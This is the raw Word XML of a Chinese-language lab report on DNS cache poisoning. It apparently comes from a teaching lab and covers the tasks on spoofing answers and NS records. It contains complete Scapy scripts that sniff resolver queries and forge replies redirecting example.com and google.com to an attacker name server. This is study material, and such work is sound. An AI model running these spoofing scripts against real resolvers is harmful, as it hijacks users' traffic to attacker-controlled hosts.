        <w:t xml:space="preserve">可以看到当前local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server没有缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBBE908" w14:textId="528FDFBC" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在Attacker主机上创建attack-2.py文件，内容如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C00CE2A" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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667FF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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00667FF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usr/bin/env python3</w:t>
      </w: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F1C72D" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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import *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7772B960" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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import sys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E8247" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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NS_NAME = </w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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"example.com"</w:t>
      </w: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188E93" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D225A65" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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7F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(DNS in pkt and NS_NAME in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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DNS].qd.qname.decode(</w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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'utf-8'</w:t>
      </w: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)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F2A8FC" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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pkt.sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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67F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"{DNS: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00667F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IP.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00667F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 --&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00667F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IP.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00667F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%: %DNS.id%}"</w:t>
      </w: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1D49B2A7" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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ip = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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IP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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src=pkt[IP].dst, dst=pkt[IP].src) # Create an IP object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5761BF" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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udp = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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UDP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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sport=53, dport=pkt[UDP].sport) # Create a UPD object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DB540" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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Anssec = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=pkt[DNS].qd.qname, type=</w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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ttl=259200, rdata=</w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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"1.2.3.4"</w:t>
      </w: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# Create an aswer record  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F426D" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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dns = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNS(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,rd=0,qr=1,qdcount=1,ancount=1,an=Anssec) # Create a DNS object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661411D5" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD0819" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoofpkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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82C7A41" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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myFilter = </w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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"udp and dst port 53 and src host 10.9.0.53"</w:t>
      </w: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 Set the filter  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5ADAEA" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FF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pkt=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sniff(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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iface=</w:t>
      </w:r>
      <w:r w:rsidRPr="00667FF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'br-968e65729223'</w:t>
      </w:r>
      <w:r w:rsidRPr="00667F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filter=myFilter, prn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486FF18" w14:textId="1BB39CE8" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>然后运行attack-2.py文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2ACD4" w14:textId="49C1E6C8" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在User主机上执行查询命令，结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF630B" w14:textId="4FA8EAE9" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00667FFE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4118AB37" wp14:editId="3C8B8638">
            <wp:extent cx="5274310" cy="30054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C955" w14:textId="6DA5D2B5" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">在local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上查看DNS 缓存，结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D916E9B" w14:textId="0E5ECA1F" w:rsidR="00667FFE" w:rsidRDefault="008C54F9" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62430BAF" wp14:editId="0D9B0014">
            <wp:extent cx="5274310" cy="4749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CC58" w14:textId="7B231DE4" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到确实拥有了www.example.com的缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3EA533" w14:textId="7ED555E2" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">之后在关掉Attacker主机上的attack-2.py程序之后，在User主机上查询就直接得到1.2.3.4的结果了，并且通过时间判断确实是直接取的local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上的缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CCD64" w14:textId="24E7BB89" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20FBB933" wp14:editId="33537CCE">
            <wp:extent cx="5274310" cy="30524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424C" w14:textId="000DFA9D" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task3: Spoofing NS Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6E90B" w14:textId="0037064D" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>上面的实验只能修改www.example.com的结果，这个Task要一次可以修改example.com整个域的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F96AEC" w14:textId="0616E367" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">先清空local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server的DNS cache。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E8FB4" w14:textId="49D1F285" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43F57FED" wp14:editId="1607F1BF">
            <wp:extent cx="5274310" cy="6242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B2C2" w14:textId="0A577F38" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在Attacker上创建attack-3.py，内容如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411163E" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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8C54F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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C54F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usr/bin/env python3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8F1FAB" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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 </w:t>
      </w:r>
      <w:proofErr w:type="spell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scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spell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import *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEA01D" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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import sys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63114CD4" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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NS_NAME = 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"example.com"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BD481E" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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def </w:t>
      </w:r>
      <w:proofErr w:type="spell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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spell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(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D847E57" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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C54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(DNS in pkt and NS_NAME in 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pkt[</w:t>
      </w:r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DNS].qd.qname.decode(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'utf-8'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)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFA879" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pkt.sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spell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"{DNS: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 --&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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%: %DNS.id%}"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0B1EEDC5" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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ip = 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IP(</w:t>
      </w:r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src=pkt[IP].dst, dst=pkt[IP].src) # Create an IP object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9460CE" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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udp = 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UDP(</w:t>
      </w:r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sport=53, dport=pkt[UDP].sport) # Create a UPD object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23528831" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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Anssec = 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DNSRR(</w:t>
      </w:r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rrname=pkt[DNS].qd.qname, type=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ttl=259200, rdata=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"1.2.3.4"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# Create an aswer record  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F92F9" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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Nssec = 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DNSRR(</w:t>
      </w:r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rrname=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"example.com"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type=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"NS"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rdata=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"ns.attacker32.com"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F625C3" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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dns = 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DNS(</w:t>
      </w:r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id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,rd=0,qr=1,qdcount=1,ancount=1,nscount=1,an=Anssec,ns=Nssec) # Create a DNS object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13725F" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241779C2" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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send(</w:t>
      </w:r>
      <w:proofErr w:type="spell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spoofpkt</w:t>
      </w:r>
      <w:proofErr w:type="spell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3A6D9C0" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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myFilter = 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"udp and dst port 53 and src host 10.9.0.53"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 Set the filter  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC5F29" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F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pkt=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sniff(</w:t>
      </w:r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iface=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'br-968e65729223'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filter=myFilter, prn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8509F" w14:textId="442CB16A" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在User主机上查询www.example.com和mail.example.com的结果:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F0FB8" w14:textId="5455A62E" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0900821A" wp14:editId="1B9C4026">
            <wp:extent cx="5274310" cy="32004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0B46" w14:textId="56FDBF68" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9B4483" wp14:editId="3CCB1BFE">
            <wp:extent cx="5274310" cy="31648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D458" w14:textId="2B27498B" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">可以看到，结果已经变成了1.2.3.5和1.2.3.6，和attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上的结果一致(见下图)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D30A4" w14:textId="38EAB904" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679BC717" wp14:editId="653B8F06">
            <wp:extent cx="5274310" cy="24758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8E25" w14:textId="07E0EEF8" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server的DNS缓存结果如图所示:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C4BB3" w14:textId="455FFF29" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F6A6660" wp14:editId="05FC9154">
            <wp:extent cx="5274310" cy="9480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91DA" w14:textId="59041662" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F46D270" w14:textId="4B85BDB4" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C54F9">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task4: Spoofing NS Records for Another Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C090F4" w14:textId="7C0A3344" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在Attacker上创建文件attack-4.py，内容如下(相比于attack-3做了修改):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B0C4C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8C54F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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C54F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usr/bin/env python3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93B686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 </w:t>
      </w:r>
      <w:proofErr w:type="spell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scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spell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import *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDF046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import sys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D876CBF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NS_NAME = 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"example.com"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63A185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def </w:t>
      </w:r>
      <w:proofErr w:type="spell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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spell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(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3845C1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C54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(DNS in pkt and NS_NAME in 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pkt[</w:t>
      </w:r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DNS].qd.qname.decode(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'utf-8'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)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8E02B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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pkt.sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spell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"{DNS: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 --&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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IP.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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%: %DNS.id%}"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2C1CB08F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ip = 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IP(</w:t>
      </w:r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src=pkt[IP].dst, dst=pkt[IP].src) # Create an IP object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE16BE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udp = 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UDP(</w:t>
      </w:r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sport=53, dport=pkt[UDP].sport) # Create a UPD object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB6B17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Anssec = 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DNSRR(</w:t>
      </w:r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rrname=pkt[DNS].qd.qname, type=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ttl=259200, rdata=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"1.2.3.4"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# Create an aswer record  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533812B1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Nssec1 = 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DNSRR(</w:t>
      </w:r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rrname=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"example.com"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type=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"NS"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rdata=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"ns.attacker32.com"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931F921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Nssec2 = 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DNSRR(</w:t>
      </w:r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rrname=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"google.com"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type=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"NS"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rdata=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"ns.attacker32.com"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ttl=259200)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2F1EE2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dns = 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DNS(</w:t>
      </w:r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id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,rd=0,qr=1,qdcount=1,ancount=1,nscount=2,an=Anssec,ns=Nssec1/Nssec2) # Create a DNS object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0B146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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D96EE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send(</w:t>
      </w:r>
      <w:proofErr w:type="spell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spoofpkt</w:t>
      </w:r>
      <w:proofErr w:type="spell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B7413C2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myFilter = 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"udp and dst port 53 and src host 10.9.0.53"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 Set the filter  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26D782" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRPr="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9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pkt=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sniff(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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iface=</w:t>
      </w:r>
      <w:r w:rsidRPr="008C54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'br-968e65729223'</w:t>
      </w:r>
      <w:r w:rsidRPr="008C54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filter=myFilter, prn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D44A48" w14:textId="77777777" w:rsidR="008C54F9" w:rsidRDefault="008C54F9" w:rsidP="008C54F9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
